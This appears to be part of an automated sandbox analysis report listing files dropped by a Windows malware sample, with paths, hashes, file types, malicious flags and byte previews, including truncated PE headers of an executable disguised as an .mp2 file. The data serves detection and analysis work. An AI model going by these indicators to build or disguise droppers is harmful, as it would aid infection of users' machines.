                                            SHA-256:3C357207A0F7F13AB548AE6373C095B6E1E9E287DCF73472874EA261D52C3DB1
                                            SHA-512:7009BBE1350006D000A642825CE71F3E3F81AC4D23867370A634AD2E898DA73BDBD8FDF00AE81B1CE6ADB15CA53113C21B2AE463ED08D0F4E89F063B1FB4BCDD
                                            Malicious:false
                                            Preview:1958S9A5Z71..StructureConstants StructureConstants..h9M08en7k50vU06Qogf26V41289a7A5527s0EQN8L42oe85BJZ2c735YN7391N15vP7U215E5aw26CZ229A15k1Tb7F94Y41YK2..GuiDateTimePicker FontConstants..0s98L762..ToolTipConstants FontConstants..8UNPlmj4x79o7KtS4k3G7C223Hdl2e24PI85h1pOa454D90L1x67m3J1BYS2711..ToolTipConstants ToolTipConstants..Aon5P96r3a7qk0B98Gi6704V5b4732t51Q01a9lt588z3o7v4e988DCmJ7r27Bn15yiW8x5p3LIOIJs5p5fER7oj287l20yL2m0IVc2c33Er5vY83q31E5Osj0NakAoH1..BorderConstants ToolbarConstants..Zo29oC9Y3J8s..ButtonConstants StructureConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\stsqqfbnw.icm

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):511
                                            Entropy (8bit):5.562757017036334
                                            Encrypted:false
                                            SSDEEP:12:Jjem3CXGHEQu/khGVswR1g3dMen3+34ToMBnZ0pNh:Jje5GHo/oWskmW43gTMLqh
                                            MD5:401F32A62946ED2570AB95938A444C0B
                                            SHA1:1E3CDF6F880E551FF15927464BA80FA530C812FB
                                            SHA-256:1AB944D42D9A110EEB8B447ACAB4C6A5EB97CCB9C6E82A5C2FB6D5C83764F660
                                            SHA-512:306C2BD55FA5A3B3BF204DD2FD42878CC53539D284BFD9DB97FBDDA788ABA628CD65A1A99A1D75E7B3AFD67AFF8C6B12A0EF82D0911B5972C5EDD0E4F694FBA2
                                            Malicious:false
                                            Preview:wmd7skr1QMY0P8HqthD1..UpDownConstants DateTimeConstants..92L7H83ZUR3800DI5Q0eZ3Z0031290j21K5B25E2grpf2034y48727yYjKlZAD8knx5o2977762d5EbScg51W9JJ3TYnJG2G4x1H445N0W9I674cjs1382a3w7J9J6nr22cd0tf8liAL36b..UpDownConstants ButtonConstants..qs8kf458gl8..ButtonConstants GuiDateTimePicker..34B6v8i06kvmh2e11Xhf3eGO2S98U0v9X7d96Q89351n8i0y6p19Vb0M02231r36Pl8MQ99332a79I1Z5146izA12T7984Dr37YYZJI8Yky8Xx6F33aF5..DateTimeConstants FontConstants..700o9ojj1fAMy9Dd9368t3y242sNJe5hM31sKhR603..ToolTipConstants FileConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\urbbvdkhg.das

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):585
                                            Entropy (8bit):5.556687161391297
                                            Encrypted:false
                                            SSDEEP:12:nw9wuTTP5VbRdVQzKLXnB5WksX/DWFuz38ivMsx9V2F0v:nipVSKDWHX/KKMaxn2av
                                            MD5:4AC2B920915EA8CB53C91208B2C67596
                                            SHA1:447FBD98D629039FC58103893E170797AB82CFB3
                                            SHA-256:494934E9B75A40123547C78C584B2D70CD87EC91357EA105CF8515DA2F21F35E
                                            SHA-512:0BCD49206A30E24D420AE9857530915EFC3E2CA75777DE4B6CE7280A134115766B68F1EC4B11D1B0A3367228E2F8181B336D968B618184EEC7AFEE0E834E77D0
                                            Malicious:false
                                            Preview:n9q73751HDh9ae818R2911L253k991ZNmD7SHa8Gmg6uT6W50wo1l1Lse..TreeViewConstants ButtonConstants..nZMAs1s5WZZBEM5wc5sOezWX6894wU3iC44Q39X20N1L5x64YWtdP23Gt0nx0EaCd883p3935WR7MH0..GuiDateTimePicker ColorConstants..8SgX84j1A0OtlhZO84O78l1A4m5322wc0P1H9734q737o5Aj8563YZBl4T69Ka69ON23x87w073t98sOH7o2f6CAVAT4xOq173pqA2977631149Wi8791G..DateTimeConstants ToolTipConstants..pfH7h9390WY692S4L48o0r5F1cl1X120292S01f37385zh620RE8WMs72488A0MT18P9a402kGQK4y4B0c18Tm9u15r500r1L14967k94106sxtR74ngzFV3zjd9pFR2c19K8w4611l484kfjOyy4qs6209090959B8l656S696r98Y694kIM91..UpDownConstants GuiDateTimePicker..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vdfovnd.msc

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):534
                                            Entropy (8bit):5.499310994661674
                                            Encrypted:false
                                            SSDEEP:6:iEbDGgsA1nVMa5HWhGW6H1VVYjgim96dmxsh1ynB3NcUMHnmIhlMZ4QZt4iPZdkc:DDZ1nVIK1QmCA0mIUuQZtJPZdsu
                                            MD5:C6B5B5E6F4B85ED8220AC9D2E0C192D2
                                            SHA1:5A3508CEC5AB3EB2E13CE51D375B644256964941
                                            SHA-256:DB7C678CC3F9E92857EA22C3648973E54BE21C840C0457DBF54C36A07CEDF374
                                            SHA-512:3EFF207263D3B6BC5F87BA296F715FFA2A3F74FEFAD443A6895ABD55370E975FB3EB029AA16D0EA7B7F5C5AD0A913C014BC8A251B68E552382B4D2952653BA84
                                            Malicious:false
                                            Preview:67389r2fv952703hOL54vhKZ65XlgFA77u248g5931sO..BorderConstants FileConstants..0X188R3WQvs0046Ho2yn61h97Wa11quEjLHGcX52623As8725cGifZ04DnPYYre643j52Dm7YsHTb3qmjS35L8c8Z97b1806R..FontConstants GuiDateTimePicker..hZ5R842M952714312iEANN0S0Eu43496044r05v0Ev45uCFpF1tE3CoA33S8JQe67f8i7l05..ColorConstants ColorConstants..4zh3tU2h02H912..FileConstants ToolbarConstants..269b20uVot1a1537c779Fo37uh75P1OuttD6N04210Xm9k26slr1u6o677PEdqx0iU6E5mV1hq4bjJ4U816a85u1aZ1679OX3jH6836jm0ZJalAXXBe883813h0093Tl8ij833d2E..ColorConstants ToolTipConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\wdsw.bmp

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.55629923462043
                                            Encrypted:false
                                            SSDEEP:12:QxitCP1tX3Szc81B/cNUCkeOBPvykcTPrBPc:2itCPXX3Sw81BENUCAFyVvO
                                            MD5:DD5F53DE2275E35D718066F0178B5F35
                                            SHA1:788A5DE3666271F43846D7A8C822D75348CE0534
                                            SHA-256:39AF59E1FAD2D7A7B2C68CA8BCE6253396F5B20E7364C421B4336091C8426904
                                            SHA-512:EB844EE731E4D6478ABC2F31D056D5CB67ED6F90A3BECADD1E50D9AA00C13D9A639111DE280AD9BB286A3BDA4F07BADDDA7543E014FAA513EC6983C497E78959
                                            Malicious:false
                                            Preview:1l3au13S4jpP0mxfB0A6679..ComboConstants FileConstants..y1tt2h0x65..FileConstants ColorConstants..fHueA831D2L52s2996o063964SO6cYvSHq57626G2I12U671hQf5C5o4HW25w4S9j..GuiDateTimePicker UpDownConstants..85m4hOYUlXNH80lp3uQO9bB8M2IWm817V262We6m1X705GAS90laN7301D6qr4EVLiZB951dt5tQ6852RJ949yCOgJJ6Z389R4Ug98x14yH92Z8O3w7Kej..UpDownConstants FileConstants..122O1768473W2j8v2y38x08W9Fx87x8a6u89Y9aX5Sa27c964NZ..DateTimeConstants TreeViewConstants..36CC6o9118ytdBHjEmZ5t45c947g9ZQnzc8C224qn84wcHP336iLypP190..TreeViewConstants TreeViewConstants..

                                            C:\Users\user\AppData\Local\Temp\RarSFX0\xfer.das

                                            Download File
                                            Process:C:\Users\user\Desktop\u549ed5dEA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):616
                                            Entropy (8bit):5.578959754900461
                                            Encrypted:false
                                            SSDEEP:12:awU9RIACrf30SL4c21htpT9qASbz/0D1veq59RLOXENaEJHQ:awU9aprscUtGxHcDJe2hAEHQ
                                            MD5:5D40EF3055F3411CEDD99FFDA78AEB6A
                                            SHA1:40DCA8CBCC56E86DFEDDEC3D9B97EAB3C16AB293
                                            SHA-256:FAEB0905278B1CF6F15CB452231D4AB3660B1AC964B44C3AA5FE23C3D4B42F7C
                                            SHA-512:48C2077AA4DF87063F5F7F14D3639CA65D44CE6082870F85AEB7968428797FE6049EE9AF68B2FA14689381046BE1650E4C49E7CC35E860AA79CE58D8C0E0EBC8
                                            Malicious:false
                                            Preview:2387Xkp71165j82B700004CJ3z5766gn991895Va4CEUr8N725M75Q4Ma1np35lKLL2R..ColorConstants ToolTipConstants..05938Gql9135GJ1JCws7314lAmd4L65g7RPs579I4251RGg93x42aN94mtQXP3V2qFqXl9wQ9lZo49kY3zd9Cl8..ToolbarConstants ToolTipConstants..j9F7nq179k418MBr69gC0OVz7656A71273GrP58562mcO054A9HZ57A4wPL2tK23088aiS98356cOea83u6ca2yd7GtWT7qqI5OW1c254ff4..GuiDateTimePicker ToolbarConstants..J4bvf8187083gpeyqg360MMy75uy3hDndoR0107T99YY5L996LL6033lOLHU6Ypj1OJ1nd6w0I5b87e3Bh2..ButtonConstants ToolTipConstants..93kgXG4u68N4wb1el8162144y7S8380O3GgGnRtx5a1ZO6s1YcdRojJ8n0ip51d126dW1t6g461wI72N0ZDxk4bz4..ToolbarConstants ComboConstants..

                                            C:\Users\user\ruum\addfgcgdsm.bmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):594
                                            Entropy (8bit):5.507408293701256
                                            Encrypted:false
                                            SSDEEP:12:ZiJN6NXVBVmhTFFBPSxXjvwF4CPtPEqcNM/DjeUmVI8oX0Q:oN6NXHEBFFgXj4nPtsjMHoI8c0Q
                                            MD5:B88AEBA366E943BAD395D31552AB26CF
                                            SHA1:278159E50CB4F4366E25E0BFC68908ED4B9F90FC
                                            SHA-256:7216D27B6B287635CF958E6EC3A70EB2AF8D931CFBE98D9BD283A7E97A07C998
                                            SHA-512:0EA99A1CF2FB2B4DAA4CCB45161554AD067D77AB7C216BF8933261A9E9CD26F3ABA8F0442D1833956561ECD94AAC243394F6AA9E06846D3B8058C5679845BF54
                                            Malicious:false
                                            Preview:M7OO13O4RK39V9UE1B4n614130FZw6ryc0N9z419q74g22xRl1K42..DateTimeConstants ButtonConstants..I7b4f2QL2LKRVhL0460IS7w32jI0A68i39d0wsH..ButtonConstants TreeViewConstants..9P5Caya7G2t57gOkT2Y54664Fz8y4ghx3t403M880om0se9x2zH0765Z4eKN0ImnjSKd57lc545kdtPFn8B2pF0f116r86JC1358y11uPLP871d72C183179y3c4K6E0..BorderConstants ColorConstants..65nTlv0085K42256173z2tFay74p3R4u9FfGIc0kSU6L672d62..FontConstants DateTimeConstants..929Og2FKe38Zj95Y6I289JCS45wJXsIct6kZ9g052ESB57862442T7tA7V4A808o6RK6u5Km003Np289xN00uS906dd97U0192r56R82Y601ooLi75071og4587ci01085SY32e0TWB0mRG8K7..ToolbarConstants ComboConstants..

                                            C:\Users\user\ruum\avnjkduhv.xls

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):670
                                            Entropy (8bit):5.597883776857722
                                            Encrypted:false
                                            SSDEEP:12:IXZJmIILZCChnctXTSlpICrBP0VSFdX13/IewTbe5rqx2nRFcRsaTMHTSRrBPc:IXZsIIFbhctDSlpICrmMdF3/I9betPUq
                                            MD5:F112FCC371CBFB12796BFA2212039663
                                            SHA1:8326FDD102E399A0FA537A4AC52FCFE5360EF907
                                            SHA-256:2E3E1E2D4DBA918789092E53E24AD6A92A03E0A09122A1C8F7303BCE86112D93
                                            SHA-512:ACA9965AA95547B7B0DF1C4E3910EA1827435BB4AB960E47E66B02816F2A33A4E2B76C6345B3A4F2FD41F32311FE013C74ECCC5470F0C710AC13223B6291E498
                                            Malicious:false
                                            Preview:o6v03oK0996464lYq534HVzNv678242sT5eG0xcEMf7JqynCi6z202eY45b7L76a6LmJHe108D750aKYUSRO6EpxFy276kD7t15mG6gvQ15tzpoo6k4r10o4LP491UM9I9jrdyCt22KK589548OYAKk95Y8ylZ1Sp5wJ153k82M6uq8k..StructureConstants TreeViewConstants..8IhHtZI4Z6I6pS2S2H9iR33iV931849..ColorConstants ColorConstants..Q74d0aR78386L5hg84t9g1t87i3Sy5gDr3E6VX3oG8u237Q6HW725..DateTimeConstants FileConstants..brs9892L670246I17I9FA6GnPbP7R9J1h737c62Iw5P40kY7gnh..GuiDateTimePicker StructureConstants..28rZ73A2oL35Hc3Wh718uZR5615KJh5F9J0sg89ba6N7r8k359i228025a5345e1t54RRP4D2nG9046lbtR43Fu0p297S04AhTqa8U6i8Pgq3JsL038U32XB85Y337Di0T2d1BX866r4Kdu66L3Iv94QS601171N16mR046zC31..StructureConstants TreeViewConstants..

                                            C:\Users\user\ruum\avqj.mp2

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\ruum\avqj.mp2.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\ruum\avqj.mp2.exe.exe

                                            Download File
                                            Process:C:\Users\user\ruum\avqj.mp2.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):947288
                                            Entropy (8bit):6.629681466265794
                                            Encrypted:false
                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                            C:\Users\user\ruum\awggmrd.xls

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):122214412
                                            Entropy (8bit):7.090094286382183
                                            Encrypted:false
                                            SSDEEP:49152:tLe6UYaLCBjCSgCN3TmQRMMpVPDWbQtL3PUa8TfTqul5Pa0JxnZAdrBcNBqu3QRb:b
                                            MD5:592AAF7AE0777B3173CFBB4D04C15DF8
                                            SHA1:CD6104DCC2D35EA01E30EBDF48556FE7256D14B5
                                            SHA-256:5691F5E0DC26586D217400C04331D2BFDF334868C9E53EAD09548B38F1FE31C1
                                            SHA-512:E5756FDC46E849FDB2FB2AB4AE6F2475B783E13D58C6EC1E35AA5D5A7CC9C98849E966C5EA7D4571960AA357538150A4165359CB4EBAC45CD618DFAFB2E59021
                                            Malicious:false
                                            Preview:..;....$....G.c.........o...p.E?.[.....#...~..xq.....<.9P.*..J....y..^he...1..:.........3.$..%..d...L.E..J...ip.h.!_.y..`..l.~......#.c.s.......|3>,...... ..7<.7.....PCi......w....*a._.'.^u..x..(..Ynyz.U....}.!cZ..X........+.KS.....g=R.x0..>..#..tR....QIR..<....K...q...k>&=(.\.............7.l.P.k.0.X.7.8.I.1.7.5.2.K.k.4.9.D.3.Y.8.5.w.Q.8.3.....3.4.f.7.n.2.2.s.i.7.R.7.4.I.a.T.p.L..... ..@.....V&..(.U....z....tZ....H.).&......,...#.3...0.. #.I6.....a.....R....>6.=x..3W.$...,...8:........n...{8 ...(.............Z8...a.1.Q..D..Rg(.l.......o..p.$Z..>q.....b.E.7.v.2.r.Y.3.4.g.4.3.4.w.G.7.....7.v.9.d.1.1.9.8.4.M.4.2.2.a.2.Y.7.o.O.7.3.D.9.n.5.H.1.3.0.t.g.V.6.9.0.D.3.......}:...........@-);=.....'..*Nt.i+%.j.HY^...:5....%...F...X,e..K.f.x...m..@..+D..D%K?..].S*....j .}.:."c..W3.......&5............4!..T}.g.l..02.sa.n...&..,B....I.:.v8`..`0..N..|.6.$.......C.3.n.6.3.2.q.G.c.w.Q.7.U.2.r.8.w.4.V.8.7.0.8.2.0.2.b.....l.l.2.0.8.6.8.D.9.4.8.2.k.....0.A.l.0.T.8.

                                            C:\Users\user\ruum\bvabjg.txt

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):577
                                            Entropy (8bit):5.640429072038616
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:F5A3546A93EF257DF068E0183A6BE09A
                                            SHA1:005DFFFAED36B3161EC8957D9E4DBB4D9F62999E
                                            SHA-256:A020A025B6515668596CBA7B29F7D59E0FDCC868FEB7CE921122CCB169D1E957
                                            SHA-512:491922F37C2F14DD0DA11005A0C037EA4CCC16B70E2F6221303F04C007F943BD8EC2DA8F38CCF90D9F7E2B35910A1E36FD46E3153A9859C22A020F12841BF14C
                                            Malicious:false
                                            Preview:66tqo4f0V85CXzZ5D5j909j5W7W2074Q7wNpHAzUYND96kaEx0XX2cS99JRBv310K84ya908JPPYL568sIEv4Sl070ZX2oO6..TreeViewConstants TreeViewConstants..1L2342QJnH7hL0Zzu6frIfX4374b36N5z1w554D76746q9df6BBO513s6y7hk395M6hzU7EsF1H9385H1f26Zo8jM9eS31Z8V71aLi78E6PZ765Nc06Al13R6zQdTT2m7VdHYuaZ479T747wI1859YUFvo6Bs565..StructureConstants TreeViewConstants..7WmO9O2hV3uAZ8ty31PuZ648j3W9I3grG175MB7p8h959Z5Or78M7z2Kk607578p8461Gu187K1o366qRBJy4ix4lR..ButtonConstants ButtonConstants..Cx20UMhc13zi85de22o7i48nII5VH02j0v8UB10917vP551344f4Qy9098FMIr0Xh4z1249w3Gu00y4V7y..TreeViewConstants FileConstants..

                                            C:\Users\user\ruum\fvrgktttt.bmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):611
                                            Entropy (8bit):5.616959606642095
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5E6C2647A97A583AC8F0458C69AA0682
                                            SHA1:8394116D40D013C7A4776B96C980B665C82C8171
                                            SHA-256:F63996739B631500B68326D0DE1FDAEDBF874072ADBCF63FA08FEB5A9E140E35
                                            SHA-512:B391F6CFA533D6D6B150BEDF87E9DB5F156D82649D7C8F9EBF75695100963852361F9DBA6BADCC67344F6F65B4903E7D4267154214599C8F4E41530FD94A77A0
                                            Malicious:false
                                            Preview:5z13y2O76R..DateTimeConstants UpDownConstants..zOL39276v763N5vMkbw3lC676v17tN6M63w121O81tw45NP1L6R80UTO0Ev48T199nvO2J8v7BM693224r7zj2l5vS54pl77G24k3j02489768..ToolTipConstants BorderConstants..hwA8E1RdFgQh7950Rga7Q1u6uy652E38Nm79xK..TreeViewConstants UpDownConstants..9krzCtZ10gl4RR74k32A7O3Co3tQ138oI6fqJXxu1Az45iwVLWG93jK5Vaz3vv8oRNFI5021W644t58nxB2vQ92i2a564Z8gj5bzGgayF6..ComboConstants ColorConstants..QK5418H29I7W3796zlho96066S39mceq5479SlWAYPP52b59c340633A0O1U6vG5u850252svAL85Qj5D0RGtT2rQZ8qq6276M44584Cq3HTh6Jbi8TL7d1AX6g57494Qwi49n6R0dc01uqlS47hHh6MYP55n9u9F7gY30Hjm..ButtonConstants BorderConstants..

                                            C:\Users\user\ruum\gbqticjd.exe

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):547
                                            Entropy (8bit):5.537995121972547
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:244237D5001A3F2E94718441A5827707
                                            SHA1:204AA66EC17B4A36C9E506ED06396C6E9406D791
                                            SHA-256:2DD862795F83E17ED4868ACD1E01285E03DC05EF479E112CF6B8F8EF069218FA
                                            SHA-512:61F641408030AC6A8AA19CA26A76BF772DC2DADFD2A4EB93351A1B58B37D7CB03DB93BC0084B006A8B8F96FD54C6F43E45ABD56905F6682E410CB4312EF6F085
                                            Malicious:false
                                            Preview:0G0OVX8W4883Qv..StructureConstants GuiDateTimePicker..IpVc2YH2F986j82586N7v6Lff16258Jl5ar7918Kd5Y5047zbNrR2R7yv583X9MfGZ45z6I1f9a8yq1vMZKHtR06447Xw1p16VA7816z1n70pnhBm4jUa3L4G76qvo811029..GuiDateTimePicker BorderConstants..909G09g0d0oX4jH3v55C22000810UwCQs17Sa1235is0Ot11b7A57e9YDj..StructureConstants UpDownConstants..Y16t3c271295e24sdA4ri9qhP..FileConstants ColorConstants..53E77G7K831Qt833kevg1047eVccC..UpDownConstants ToolbarConstants..02769BCE6fC604l6zK7P261vj3A87NFd2K2RuXER21Gs8d775c9iceytX190h7z7j570Z9O..ButtonConstants ButtonConstants..

                                            C:\Users\user\ruum\hbeol.xls

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):602
                                            Entropy (8bit):5.481262288382369
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4BE1782DD75BEA42BD21D2CDB957D968
                                            SHA1:05D4EF3082D28664B95D40DE8BF44F2592B0A08D
                                            SHA-256:D5A56B384CFFC80A412150029EEE4093651A382F7850FF2069CAB1782B2D8CEE
                                            SHA-512:9E474360F86D242A5FC564A5CEE90E493803C7AB7ED9510DDB10472D62B17999D28717F6435EF6D0B8294A5EFDB98E4E94E4FC606486605D700E7BAF8E5FCCF1
                                            Malicious:false
                                            Preview:07o2269yr3555wFk0anf8Hd1GhH9t326e9u9c946En9vB04g813fEKMvF8Ca5r227d739F7X29X3Kov35y74S4..BorderConstants DateTimeConstants..ed86R7LbyHgPEJ7Y76k7Wb2NEy..FontConstants ComboConstants..H14kHH8379m1hZ9xv9908hz97NG1k466103vHxCMM5Sa1448fd7l3a6n4dc60..TreeViewConstants FontConstants..229KC6h93e190qXlEgwGoE80ZTrl5d6NMP1FTqTB5D2I64sVv2LzN2dKq03z8T72TT859..ToolbarConstants ButtonConstants..aem6698vJuaGL3k12f11T58krp13DjFm5323499293085K89Uv8oNO9nG8K5..FontConstants DateTimeConstants..598Tb1Wk339OI29yV433Z56n020K0R55J5532v15541E5k1m00R2250r56qh4Q3v3MzPjefs2K8128y1Phdh5C7..StructureConstants ButtonConstants..

                                            C:\Users\user\ruum\icusk.pdf

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.613240557651606
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9BA71A01EA360FF983EF25E37B7DE07E
                                            SHA1:5C3C659DFF5DBFAF718751BDF1EA473437545E2A
                                            SHA-256:018624A9D5CA113122118CF7E654B2C75221F79AF21B1866F9001164EE9D1072
                                            SHA-512:B5DEEB3F27B1D8EAC801810BEDE1205D51D3A44AE5231A8FDFA332AD5EA4C24D78D9C70B6735ADDD2825DDDFA01BD3EB63B73C2873BBA7136EB22037A09C2360
                                            Malicious:false
                                            Preview:g1L971MaQZZdX04A5964o9M75vu37q6LR3sW6O05ETMyBkb1P2h3F9z27892eD22jB8..ToolbarConstants ToolbarConstants..6vVbUs6HGW8r3346E31o6r5371Xr0FPAdO94e11S345nP5b19dWTbG34Yco1X6844GJ455og4L948McR9oVUebvyI2FMNuO3A5Y1IpG9VCQ0k4Q7e02q3b7WPB76y698Bi6680HG0ET5S..ColorConstants TreeViewConstants..5fc8l5pW48Yu777T182Uj4nP12370Pv782e84U29lk409MufV895283N38826JU6O3xWqHB3EbvNe640C8V01H0xz4c606tkC09Eo4O76h98ea3h05547qA3803P01Y6h29Ngz9Ko7Tn595R6DXqAzL028M9Y1e4s72SaE..ToolTipConstants TreeViewConstants..wkZ9Ew5s4rkj129..DateTimeConstants BorderConstants..

                                            C:\Users\user\ruum\ijdstgvd.xls

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):536
                                            Entropy (8bit):5.563876401628908
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5E364FBA31203ABC4D6B2419B07FC38A
                                            SHA1:2591D6688946DD1B5674892ABC81FB78D91627B3
                                            SHA-256:210BCDF33BCD1A9B7F7499E168A4BF0D7B7318D69BB1220202599C9FFFBE8501
                                            SHA-512:CB92AECDA89BB657B8E96D2990D8765B8693889942EB9311D5477B3C1171C56F85A95471F7340FD50A1BE34B4A6AF5823AD88C25C0852167694A5B89889EABDA
                                            Malicious:false
                                            Preview:WDP97l7qhL6C52IJUMZ7U30a04HZ1f591l0mk2PmS2e7k5l89Un62a7264Q2072QOp0p044wJ625YuK9496Oc18h5oMu930W0E8kP1W0KV98ZO4SFs8FfN1..ColorConstants TreeViewConstants..hb1tn4vwnd47oRDqNpQz8f7j1CN2lZk3yEA57sC49i150u2b2x8A056Y61dv3F7d02Pr46O7P841iym3G7UdwZ0j0Ajs07h69Z6F7132A7012b9t62k31YN1Rb2Wb8Xgmlr5pQJz9znDi0prQ028e8U2kL9HQf65s..ToolbarConstants ButtonConstants..4Q2w7Eu37lZVX02g23wn180bo5YXnx2Wet9Z89598jp6nl8F2888I54C7r6Z1419297w986jZx0J37bLan..FontConstants ButtonConstants..11H9T3yuQx1Zr0494CW8er27oe5n12Nrg..TreeViewConstants ComboConstants..

                                            C:\Users\user\ruum\iomkk.dll

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):551
                                            Entropy (8bit):5.515387971132597
                                            Encrypted:false
                                            SSDEEP:
